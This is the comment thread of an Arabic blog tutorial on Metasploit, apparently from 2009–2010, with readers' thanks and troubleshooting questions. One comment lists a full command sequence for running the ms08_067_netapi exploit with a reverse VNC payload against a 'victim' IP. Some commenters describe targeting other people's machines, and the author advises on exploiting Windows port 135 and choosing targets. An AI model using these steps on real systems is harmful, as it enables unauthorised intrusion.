    @migren: شكرا أخي.. أنا اخترت rapidshare لأني أملك حساب عليه ولأضمن بقاء الكتاب كوني أني لا أستطيع رفعه على سيرفر المدونة.

    @lov3r: شكرا على الكمات والدعوات الجميلة أخي.. أتمنى أن يكون الموضوع نال اعجابك وأهلا بك في أي وقت

67. 67- فتى عاشق لعالم البرميجية كتب بتاريخ: 17 Jan 2009 الساعة: 12:42 PM
    

    شكرا لك اخي فعلا ان الافضل في جميع المجالات (اختراق الاجهزة والامواقع)

    بس عندي سؤال هل الثغرات يجب ان تكون مكتوبة بلغة خاصة لقرأها الميتا
    مثلا .pm ؟

68. 68- Br4v3-H34r7 كتب بتاريخ: 18 Jan 2009 الساعة: 4:54 AM
    

    @فتى عاشق لعالم البرميجية: أخي اقرأ الموضوع ثم اطرح أسئلتك. لا تعليق!!

69. 69- القيصر أسد بابل كتب بتاريخ: 29 Jan 2009 الساعة: 12:35 PM
    

    لسلام عليكم
    الميتا سبوليت برنامج اكثر من رائع للهكر وواسع جدا في هذا المجال
    احد الامور التي يوفرها هو الريموت دسكتوب
    فحبيت اجرب هذا الشيء وقد ساعدني بهذا الشيء احد الاصدقاء الاستراليين حيث ارسلي المقطع على اليوتيوب من فتره ليست بالطويله لكن للاسف لم تنجح معي الفكره وتناسيت الموضوع حتى شاهدت الموضوع على موقع الاخ عبد المهيمن
    ساكتب الخطوات وارجوا من اخواني مساعدتي في ايجاد الخطوه الخطأ التي بسببها لم انجح في التنفيذ

    1- show exploits
    2- use windows/smb/mso8_067_netapi
    3- show options
    4- set rhost (victem ip)
    5- set target 0
    6- show payloads
    7- set payload windows/vninject/reverse_tcp
    8- show options
    9- set lhost (my ip)
    10- exploit

    لكن لم يتنفذ اي شيء وظهرت لي رسالة
    no session
    وكما نقول باللهجه العراقيه قوم التعاونت ماذلت
    اخوكم القيصر

70. 70- Br4v3-H34r7 كتب بتاريخ: 30 Jan 2009 الساعة: 3:25 AM
    

    أخي كما ذكرت بالموضوع وفي الردود أكثر من مرة ثغرات الميتاسبلويت وثغرات الـ remote بشكل عام دقيقة جدا وأي خطأ سيؤدي لفشل الثغرة وعدم تنفيذها بطريقة صحيحة خصوصا اذا كان التطبيق على أنظمة ويندوز لأن اعدادت الثغرة تختلف من لغة للغة ومن اصدار SP لاصدار آخر! وقد يكون سبب عدم تنفيذ الثغرة هو أن الجهاز محدّث أو أنك اخترت اصدار خاطئ!

71. 71- الكابوس المخيف كتب بتاريخ: 30 Jan 2009 الساعة: 9:02 AM
    

    شرح ابداااااااااااع اهنيك صراحه

    اقسم بالله كفوووووو على الشرح الي ولا اروع

72. 72- ][ professor DeXTeR ][ كتب بتاريخ: 02 Feb 2009 الساعة: 5:33 PM
    

    أحييك على موضوعك الشيق والجبار أخي عبد المهيمن

    وفقك الله فيما تصبو إليه و يرضاه

73. 73- GhoSt كتب بتاريخ: 13 Feb 2009 الساعة: 3:49 AM
    

    Ghost Wh!spEr

    ana moahmed ( Ghost Wh!SpEr) mn egypt

    wa thnx awy 3ala al ktaaaaaaaaaaab

74. 74- نهو الحالي كتب بتاريخ: 17 Feb 2009 الساعة: 5:24 PM
    

    خطير انت اخي في انتظار جديدك ياحلو ………………………

75. 75- المجهوول كتب بتاريخ: 07 Mar 2009 الساعة: 8:07 PM
    

    اخوي طبقت شرحك بس بالجزء اضافة ثغرة ما عرفت اضيف الثغرة جربت كل الطرق الممكنة
    اذا في عندك فكرة اخوي عن هذا الشيء قول لي
    انا استخدم وندوز
    انا انتظر….
    تحياتي
    المجهوول

76. 76- Br4v3-H34r7 كتب بتاريخ: 08 Mar 2009 الساعة: 2:09 AM
    

    @المجهوول: استخدم Linux لا أعلم لماذا الجميع مصر على ويندوز! على كل حال أتوقع أن الطريقة نفسها لكن عليك استخدام المسار التالي:

    C:\Documents and Settings\[USER]\Application Data\msf3\

    عوضا عن المسار الموجود في الشرح (لست متأكد من الطريقة لأني لا أستخدم ويندوز!) بالتوفيق…

77. 77- المجهوول كتب بتاريخ: 08 Mar 2009 الساعة: 2:26 PM
    

    مشكوور اخوي
    اخوي بدي لينوكس مش لاقي اسطوانة
    بس ان شاء الله رح انزله من النت
    المهم اخوي اعرف المسار ووضعت بيه وكل شيء ما اجت الثغرة
    اخوي انت اظن عرفتني بالشبكة الاحترافية ووضعت موضوع ترحيب بك
    اهلا وسهلا بك مرة اخرى
    تحياتي
    المجهوول

78. 78- Br4v3-H34r7 كتب بتاريخ: 09 Mar 2009 الساعة: 1:47 AM
    

    العفو أخي.. لا أعلم أي شيء عن موضوع الترحيب أو “الشبكة الاحترافية” التي تتكلم عنها, قد يكون شخص آخر أو شخص يستخدم نفس اللقب! مع العلم أني لست مشترك بأي مواقع غير المذكورة بصفحة مـن أنــا.. تحياتي!

79. 79- المجهوول كتب بتاريخ: 09 Mar 2009 الساعة: 10:47 AM
    

    اوك اخوي ما علينا
    المهم خلينا بالمشكلة
    شو الحل اضافة ثغرة
    انا انتظر جوابك اخوي …..
    تحياتي
    المجهول

80. 80- ياسين كتب بتاريخ: 26 Mar 2009 الساعة: 3:51 PM
    

    السلام عليكم
    ياشيخ والله تابعت كل دروسك وطبقت الدرس بس شوف شو طلع لما عملت exploit
    >> exploit
    [*] Started reverse handler
    [-] Exploit failed: The connection timed out (الايبي). [*] Exploit completed, but no session was created.
    msf exploit(ms04_011_lsass) >

81. 81- Br4v3-H34r7 كتب بتاريخ: 27 Mar 2009 الساعة: 2:51 PM
    

    أخي أتوقع أن رسالة الخطأ أكثر من واضحة ويوجد عدة أسباب لعدم عمل الثغرة بالشكل المطلوب, لا أستطيع أن أقول لك أكثر من تأكد من الخيارات التي استخدمتها وأن الجهاز الذي تحاول اختراقه ليس محدّث أو أن مدير النظام لم ينصب ترقيع للثغرة!

82. 82- ameurel كتب بتاريخ: 30 Mar 2009 الساعة: 10:43 PM
    

    اخي انا لدي لينيكس توزيعة mandariva هل يمكن استعماله في تلك التوزيعة
    ادا نعم هل مسارات تتبدل

    و شكراااا

83. 83- ameurel كتب بتاريخ: 01 Apr 2009 الساعة: 12:04 AM
    

    انا جربته المسار /home/mustapha/Bureau/framework-3.2 ./msfconsole
    لكن لم يشتغل معي

84. 84- Br4v3-H34r7 كتب بتاريخ: 01 Apr 2009 الساعة: 1:05 AM
    

    أخي ادخل من سطر الأوامر الى مجلد المشروع ثم نفذ الأمر السابق..!

85. 85- دكتورصياعه كتب بتاريخ: 10 Apr 2009 الساعة: 11:00 AM
    

    يعطيك العآفيـه كفيت وافيت وشرحك كـآفي عسـىى ربي يوفقك تسلم يمينك
    ومشكـور وعسـى كل ذنبك مغفور ^_^ وهذا أيميلي يآملك ffa_12@hotmail.com

86. 86- العاشق كتب بتاريخ: 23 May 2009 الساعة: 9:53 PM
    

    يعطيك العافيه لاهنت على الشرح

87. 87- Dz_V!rUs كتب بتاريخ: 28 May 2009 الساعة: 1:43 AM
    

    
    شكرا أخي بارك الله فيك
    لكن ممكن أجرب ثغرات الميتاسبلويت على جهازي
    أي أكون المهاجم والضحية في نفس الوقت
    لكي اتدرب على الأداة
    الرجاء أفدنا

88. 88- GH.SK.GH كتب بتاريخ: 28 May 2009 الساعة: 1:36 PM
    

    مشكور أخي والله شرح يستاهل كل التقدير
    لكن فيه مشكل في إضافة الثغرات و أنا أستعمل الإكسبي وشكراااا
    أضع الثغرات في هدا المسار لكنها لا تظهر بعد تشغيل الميتا
    msf32\modules\exploits\windows
    ممكن الحل أخي
    

89. 89- Br4v3-H34r7 كتب بتاريخ: 28 May 2009 الساعة: 6:44 PM
    

    @Dz_V!rUs: أجل تستطيع ذلك لكن هل تستخدم نظام يحتوي على ثغرات هذا سيعرضك بشكل كبير للاختراق الأفضل انشاء مختبر خاص بك باستخدام برنامج VMware مثلا وتنصيب عدة أنظمة تخيلية بداخلة والتجربة عليها.

    @GH.SK.GH: للأسف لا أستطيع مساعدتك لأني لا أستخدم نظام ويندوز ببساطة! اما استخدم لينوكس أو قم باستعمال Metasploit من LiveCD مثل Back|Track.

90. 90- GH.SK.GH كتب بتاريخ: 29 May 2009 الساعة: 7:36 PM
    

    مشكور أخي أنا أقدر ظروفك و إنشاء الله سوف أنصب لينيكس
    بالتوفيق للجميع

91. 91- Abu_Virus كتب بتاريخ: 05 Jun 2009 الساعة: 2:12 AM
    

    بارك الله فيك

    موضوع مفيد للمبتدئين

    

92. 92- unforgiven كتب بتاريخ: 05 Jun 2009 الساعة: 3:37 PM
    

    سلام اخي ممكن مساعدة فانا عند استعمالي لل ميتا لم استطع الاتصال بجهاز صديقي الذي على المسنجر حيث اتبعتك خطوة خطوة و عند عمل اكسبلوت
    set LHOST *********
    exploit
    Exploit Failed: Connection timed out X.X.X.X:444
    ممكن مساعدة ضروري

93. 93- Br4v3-H34r7 كتب بتاريخ: 07 Jun 2009 الساعة: 12:18 AM
    

    @unforgiven: جهاز صديقك على الماسنجر رسالة الخطأ واضحة أخي Connection timed out! ولا أعلم أي ثغرة استخدمت حتى تتصل به عن طريق المنفذ 444!

94. 94- Hit-Man كتب بتاريخ: 16 Jun 2009 الساعة: 4:54 AM
    

    تسبم حبيبي

    و الله شرح فوق المستوى
    و الله بدي اسئلك سؤال..
    -ما هي النتيجة اللي تجي بعد استهداف الموقع تعني هل نسفه هل حصول على الاسم و الباس الادمن و لا شئ أخر ممكن تدكرلي ما هو ؟

    و شكرا لك أخي

95. 95- احمد كتب بتاريخ: 21 Jun 2009 الساعة: 10:51 PM
    

    السلام عليكم
    طيب حبيبي انا عملت الخطوات بس بعد هكذا المفروض الرابط يصير ايه عشان تعطيه للضحية ؟
    يعني لو الاى بى اللى منفذ منه العملية هو 192.168.1.3 و الأى بى اللى حتخترقه 192.168.1.8 فاللى سيتم اختراق جهازه (صاحب 192.168.1.8 ) المفروض يفتح ايه بالضبط ؟؟ وبأى بورت ؟؟
    وهل البورت 4444 لازم يكون مفتوح بالجهاز ؟

    اخوى انتظرك على احر من الجمر ويارب ترد علطول وشكراً

96. 96- احمد كتب بتاريخ: 22 Jun 2009 الساعة: 12:50 AM
    

    ياترى اين ذهب التعليق الاخر لى؟؟
    اخى الكريم كان سؤالى هو ماذا سيكون الرابط الذى تعطيه لضحيتك وهل يجب ان يكون البورت 4444مفتوح بجهاز المٌخترق

97. 97- عبدالمهيمن كتب بتاريخ: 22 Jun 2009 الساعة: 4:58 PM
    

    @احمد: اقرأ الموضوع مرة أخرى بتمعن وستعرف أن المنفذ 4444 سيتم فتحه بعد تنفيذ الاستغلال!! أي عندما يوجد ثغرة في النظام/البرنامج يتم ارسال الاستغلال وفتح المنفذ 4444 لتتمكن من الاتصال به.

98. 98- MAD_WOLF كتب بتاريخ: 30 Jun 2009 الساعة: 9:38 PM
    

    ناااايس والله انك صنديد يعني بطل
    استمر..
    <<<<<متااابع بصمت

99. 99- AlooOha كتب بتاريخ: 02 Jul 2009 الساعة: 1:17 AM
    

    السلام عليكم ,,
    ياوحش الوحوش
    والله انت بطران البطرانين تصدق الناس تتمنى اضافه اي مشهور يعني اللي يبي لاعب كوره واللي يبي ممثلـ او مغني , , يجلس معه خمس دقايقـ ,, انا صراحه ما اتمنى الا اني اضيفك واجيبك بطياره خاصه واجلس معك ربع ساعه < وش عنده الكاش
    علشان ناخذ منك جميع ما تعرفه عن الميتاسبلويت ثم بعدها برى الباب ,, خخخخ اقصد نرجعك ..
    هذي مقدمه عن مشاعري اتجاهك حاليا

    مقدمتي انا ماعندي معلومات عن الاختراق الا 1% وهالواحد اعرف كيفه الاختراق وشلون بس اما برامج واستغلال لا والله ,, بس عندي الحمدلله عندي فكر كمبيوتري يعرف يطبق ويعرف يغير حسب حاجته < اقولها لاني اشوف بعض الدروج في منتدياتنا مايعرفون يطبقون الشروح < وكذا هم يرفعون معنوياتي واحس اني شوي مميز

    بس بسئلك اسئله عده وارجو انك تتحملني عالسالفه الطويله

    1- جربت بالباك تراك 4 على جهاز اخر في الشبكه معي بنظام ويندوز اكس بي وسكرت جدار الحمايه وعلما بان الجهاز محدث الى اخر تحديث في هذا اليوم يعني سيرفر باك3 واصل الويندوز الاكس بي كان ويندوز اكس بي سيرفر باك 2 < كاتب هالملاحظه لاني في فحصي بـ nmap
    عطاني معلومات انه OS details: Microsoft Windows XP SP2 وانا عارف انه سيرفر باك 3
    وبعض الاجهزه يعطيني انه ويندوز 2003 وانا اعرف ان محدث الى سيرفر باك 3
    انا اقول هالكلام لان في شرحك target حددت الاكس بي سيرفر باك 2 وحددت وحاولت الثالثه 3
    وايضا عندما اعرض targets يطلعي انواع الاكس بي عربي وفرنسي وانجليزي فوق 100 نوع
    فخفت ان اصله انجليزي ومعرب جربت اغير يعني حاولت جميع الخيارات الممكنه
    حبيت اذكر هذي علشان تقول هل فيه فوارق في اني احدد قيمه targets ولا لا
    ثاني شي بعض الاستغلات تكون القميه targets ( اوتماتيك ) < واقد اغيرها طبعا
    هل تنصح بتغيرها ولالا ؟

    2- في فحص للمنافذ 135 و139 و 2869 كانت كلها اوبن والسبب اني معطل الجدار
    طبعا 135 Microsoft Windows RPC ومعروف في كل الاجهزه
    و139 ما حط لي اسم لاستغله وانا مثل ماقلت لك جاهل مع اني اعرفه انه منفذ لنت بيوس في كل الاجهزه
    ومنفذ 2869 Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

    انا جربت استغل 135 الظاهر انه بـ windows/dcerpc/ms03_026_dcom
    طبعا كلش سويته صح ولكن ما ارسل شي وعرفت ان هالاستغلال قديم وكذا حاط في مقدمتي انه جهاز محدث الخ وكذا على ما اعتقد اللي ابيك تتاكده لي انه خلاص ماتنفع على الجهاز ولو ان البورت 135 مفتوح وبدون جدار حمايه

    وهل في هالاجزه السيرفر باك 3 من البورتات اللي فوق اقدر استغل :( ؟

    3- في جهاز في الشبكه عندي لقيت عنده بورت 1110 +19780
    ما رايك في البورتين هل تتدل على اختراق احد للجهاز وهل اقدر استغلها انا بالمتاسبوليت

    ——————–
    اخيرا واقسم بان مدونتك شي خيالي من جميع النواحي ..المواضيع والمتابعه وحتى الوان المدونه طلقه بمعنى الكلمه وتصميمه بهذا بهذا الشكل يدل على الذوق اللي تملكه في اختيارك لها بهذا الشكل ,, وهذا الكلام موب تشيجع تستحقه بس .. الا طمع ايضا في ان تستمر بهذي الطريقه :
    D
    واقتراح بسيط انت واحد ولا اظنك تلحق كلش وخاصه بان مدونتك يزاداد زوارها والعالم يبونك تستمر في العطا الصدق ..
    فلو تخلي احد يساعدك ممن تثق فيه يكتب الشروح للمبتدئين وانت في شروحك الجديده تربط برابط يرجع لشرح الخاص لمبتدئ قبل ان يشوف شرحك ..ولا تجيك مثل هالاسئله قبل ان تيدا علشان تصير المدونه 100% وكذا يحصل لك وقت اكثر واكثر وهو عباره عن اقتراح واسف اني حطيته بالرد

100. 100- tnk كتب بتاريخ: 14 Jul 2009 الساعة: 4:00 PM
     

     مشكور اخى على المعلومات القيمة والمجهود الاكثر من رائع و كلمة شكر لا تكفى …….. ونسئل لك لك ميزيدا من التالق بادن الله
     صراحة موضوع منطم و جميل فى خطا مطبعى بسيط ان شاء الله فى الجملة دى “”" المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm “”"” الثغرات كانت بامتداد pl وليس PM

101. 101- عبدالمهيمن كتب بتاريخ: 15 Jul 2009 الساعة: 2:19 AM
     

     @AlooOha: عذرا.. يبدوا أن تعليقك سقط سهوا فالآن حتى انتبهت له! ربما لأنه طويل فأجلته لوقت آخر ثم نسيته << ارحمنا بحجم التعليق في المرة القادمة
     بخصوص nmap فهي تعتمد على الـ Remote OS Fingerprint وتحاول معرفة النظام عن بعد, لكن النتيجة تكون تقريبية ولا تستطيع الجزم بأنها صحيحة! وطبعا يوجد فرق بين حزمة Service Pack وأخرى وبين لغات النظام لأن عندما تتغير الـ Service Pack أو لغة النظام تتغير بعض ملفات dll وهي الملفات المسؤولة عن التعامل مع الكيرنل في نظام ويندوز والتي يتم الاعتماد عليها في استغلال الثغرة وتشغيل الشيل كود في الذاكرة. عندما تجد خيار automatic متوفّر فالأفضل أن تبقى عليه لأنه الأضمن وسيقوم بتجربة الخيارات حتى تعمل الثغرة (الا اذا كان لك غايات أخرى) بخصوص المنافذ التي ذكرتها فهي منافذ خاصة بنظام ويندوز واذا كانت مفتوحة لا يعني أنك قادر على اختراق الجهاز (اذا كان محدث), بخصوص المدونة أنا الذي أكتب فيها فقط لأنها ببساطة "مدوّنة" يوجد مجتمع iSecur1ty أكتب به أنا ومجموعة من الأصدقاء.

     @tnk: البرامج المبرمجة بلغة بيرل تأتي عادة بالامتداد pl لكن حسب معلوماتي وتعاملي مع المشروع الثغرات كانت تأتي بالامتداد pm ويمكنك مراجعة موقع ميلوورم للتأكد (بالمناسبة لا يوجد فارق ان كانت pm أو pl فالثغرة ستعمل على مفسّر بيرل مهما كان الامتداد!)

102. 102- Mr Nawaf كتب بتاريخ: 30 Jul 2009 الساعة: 3:51 AM
     

     مشروع الميتا مشـروع نـآجـح فعـلاً لمن يجيد أستخدامه

     شكـراً لك يا عبد المهيمن على الشـرح ,,

103. 103- B4CK7R4CK3R كتب بتاريخ: 01 Aug 2009 الساعة: 11:37 AM
     

     السلام عليكم ورحمة الله وبركاته
     ما شاء الله مدونتك اخي رائعة وجميلة انا نفذت الشرح على احد الاجهزة معي في الشبكة ولاكن تظهر لي رسالة لا اعلم ما هي انظر هذا ما يخرج لي عند تطبيق امر EXPLOIT
     Started reverse handler
     [-] Exploit failed: The connection timed out (10.0.0.2:445).
     [*] Exploit completed, but no session was created.
     msf exploit(ms08_067_netapi) >
     ما معنى هذا اخي وشكرا لك على اية حال

104. 104- t4h3r كتب بتاريخ: 06 Aug 2009 الساعة: 8:19 PM
     

     بارك الله فيك

     والله جامد جداً وواضح جداً انك تعبت
     بص انا مبتدئ فى الباك تراك عموماً واتعلمت طريقة تثبيتها من المدونة وتابعت معاك الشرح للأخر بس طبعاً ما فيش حد اجرب عليه
     هابقى اخلى حد من صحابى فى الشبكة يفتح برنامج من اللى موجودين فى الميتاسبلويت واجرب انفذ عليه .. وان شاء الله اقولك النتيجة

     تسلم ايدك يا باشا

     اه عايز اعرف حاجه
     إزاى اقدر اتعلم حاجات كتير فى الميتاسبلويت .. مع العلم انى مبتدئ طبعاً ودى اول مره افتح المشروع ده

105. 105- كوبرا الموت كتب بتاريخ: 10 Aug 2009 الساعة: 9:39 PM
     

     مشكور على الشرح الوافي يا اخ وتحياتي وكل الاحترام لما قدمت مع افاده
     والله لا يحرمنا من جديدك

106. 106- Muslim كتب بتاريخ: 12 Aug 2009 الساعة: 6:06 AM
     

     سلام عليكم يا عبدالمهين ..

     لابد نظام Linux عشان أقدر استخدم Metasploit

     أو ممكن التعامل معه في بيئة الـ windows

107. 107- ملك الميتا كتب بتاريخ: 17 Aug 2009 الساعة: 2:01 AM
     

     ( السلام عليكم ورحمة الله وبركاته )
     كيف حالكم

     اخوي مشكورر رررررررررررررررررررررررررررررر وما قصرت

108. 108- Dr.X3 كتب بتاريخ: 20 Aug 2009 الساعة: 3:54 PM
     

     أفدتني أخوي عبدالمهين 10000% درجه جزاك الله كل خير .. شروحاتك مميزه ونادره . الف شكر لك .. تقبل خالص تحياتي أخوك عبدالله التميمي

109. 109- majed كتب بتاريخ: 03 Sep 2009 الساعة: 8:14 PM
     

     السلام عليكم اخي الكريم

     سؤال محيرني وعقدتي حاليا هي ؟
     هل يجب ان يكون الايبي تبعي يكون مثل ( ×.×.192.168 ) مع العلم ان هذا الايبي يعتبر من الراوتر .. اي شبكه داخلية . لنفترض انه يجب ان يكون كذلك .. كيف نجلب الايبيات اللتي تحتوي على شبكة داخليه ؟؟ مع العلم ان شبكتي ليس بها غيري انا وهو ايبي واحد فقط ؟
     اذا كان قصدك بعمل فحص على شبكتي عن طريق Nmap فهل هذا يعني انه سيقوم بفحص الشبكه العنكبوتية كامله ؟؟
     ارجوا ان تعذرني على اسئلتي التي قد تكون اكثر غباء من ان يسألها شخص مثلي لكن منكم نستفيد ونتعلم .

     وشكرا لك على المدونه الرائعه جدا جدا .

110. 110- abuzyad كتب بتاريخ: 16 Sep 2009 الساعة: 10:16 AM
     

     اخي لك كل الشكر والتقدير على ها الطرح الجميل والموضوع القيم , تحياتي وننتظر المزيد من ابداعك عزيزي .

111. 111- Mr-lOwlY كتب بتاريخ: 25 Sep 2009 الساعة: 2:41 PM
     

     أهلا ً أخــي و الله إإبدآآآآع .. بارك الله فيك على الدرس الرائع … بالتوفيق لك ~

112. 112- fvt3 كتب بتاريخ: 29 Sep 2009 الساعة: 12:09 AM
     

     ماشاء الله عليك .. مبدع !

113. 113- سلام عليكم كتب بتاريخ: 30 Sep 2009 الساعة: 9:10 PM
     

     ارجوووووووووووووووك ارفع الكتاب وربي مالقيته لا في المنتديات اعربية والاجنبية بفلوس
     ممكن ترفع الكتااااااب ابليز ارجوك يرحم والديك

114. 114- SkuLL-HacKeR كتب بتاريخ: 30 Oct 2009 الساعة: 3:41 PM
     

     موضوع جيد وآعتبره مشروع بداية تعلم كل مبتدئ

     موفق !F

115. 115- SIFE كتب بتاريخ: 02 Nov 2009 الساعة: 12:56 PM
     

     السلام عليكم و رحمة الله و بركاته
     هل يمكن البحث في Metasploit عن ثغرات لنظام معين فقط ؟

116. 116- عبدالمهيمن كتب بتاريخ: 02 Nov 2009 الساعة: 6:58 PM
     

     @SIFE: يمكنك استخدام الأمر:

     search windows

     من داخل سطر أوامر المشروع وتستطيع البحث عن الثغرات في الواجهة الرسومية و الواجهة التي تعمل من المتصفّح أيضاً.

117. 117- TOP SAT 13 كتب بتاريخ: 03 Nov 2009 الساعة: 7:47 PM
     

     السلام عليكم
     والله شرح ممتاز بارك الله فيك اخي الشارح …
     هل تستطيع ان ترفع الكتاب الموجود على موعق اخر غير 4 shared و rapidshar
     لانني لم استطع تحميله

118. 118- SIFE كتب بتاريخ: 24 Nov 2009 الساعة: 12:02 PM
     

     السلام عليكم و رحمة الله و بركاته
     عندي مشكلة مع metasploit 3 منصبة على FreeBSD 7 داخل VirtualBox ،عند تنفيذ الأمر exploit بعد ثواني تظهر لي time out ،رغم وجود نظام WinXP SP2 على شبكة VirtualBox .
     الأمر ping يعمل عادي :
     ping 10.0.0.4

119. 119- وه بس كتب بتاريخ: 25 Nov 2009 الساعة: 4:29 AM
     

     وربي موقعك شي وعاجبني مره

120. 120- fwv@hotmail.com كتب بتاريخ: 12 Dec 2009 الساعة: 9:35 AM
     

     كفوووووووووووووووو والله

     يعطيك العافيه على المعلومات القيمه

     جاري الحفض في المفضله

     

121. 121- عبدالرحمن العتيبي كتب بتاريخ: 22 Dec 2009 الساعة: 7:45 PM
     

     سلام عليكم

     كيفك اخوي ان شاء الله طيب … الموضوع جداً روعه والاروع المدونه والاروع من ذالك هو انت

     عندي سؤال بسييط بس

     انا اضفت اسم مستخدم ورقم سري جديد في الميتاسبلويت باحدى المواقع لاكن لا اعرف ماذا افعل بعد ذالك ..

     اشكرك

122. 122- linuxshell كتب بتاريخ: 17 Jan 2010 الساعة: 3:54 PM
     

     السلام عليكم
     
     مشروع الميتا من اقوى المشاريع التي اعجبتني في عالم الاخترق

     لكن س

     مثلا قمنا بSCAN باداة NMAP فوجدنا المنفذ عدد 135 مفتوح

     فماهي الثغرة التي نستعملها ؟؟؟ او التي تستعمل الPORT 135

     بارك الله فيك

123. 123- SIFE كتب بتاريخ: 28 Jan 2010 الساعة: 3:22 PM
     

     السلام عليكم و رحمة الله و بركاته
     لدي مشكلة مع MS بحيث مع تنفيذ الثغرة فإنها تظهر لي الراسلة التالية :
     [*] Started bind handler
     [*] Triggering the vulnerability…
     [*] Exploit completed, but no session was created.
     المشكلة كما ترى أن تنفيذ الثغرة لا يكتمل لا أعرف لماذا ،هل لديك فكرة .

124. 124- عبدالمهيمن كتب بتاريخ: 28 Jan 2010 الساعة: 6:19 PM
     

     @linuxshell: المنفذ 135 يستخدم بنظام ويندوز يمكنك مثلا تجربة الثغرة المكتشفة في خدمة dcom والتي تمكنك من اختراق النظام عن بعد, لكن ليس بالضروري أن تتمكن من ذلك لأن الثغرة قديمة نوعاً ما ولن تتمكن باستخدامها من اختراق الأنظمة الحديثة لكن معرفة أن النظام هو ويندوز يفتح لك المجال لاستخدام العديد من الثغرات الأخرى التي تمكنك في النهاية بطريقة أو بأخرى اختراق النظام.

     @SIFE: رسالة no session was created تعني أن استغلال الثغرة فشل ويوجد 100 احتمال لذلك خصوصاً أنك لم تذكر أي تفاصيل عن الثغرة, راجع موضوع الاستخدامات المتقدمة وابحث في التعليقات فغالباً ستجد معلومات مفيدة تكمل الموضوع.

عذراً.. لقد تم اغلاق التعليقات على هذا الموضوع!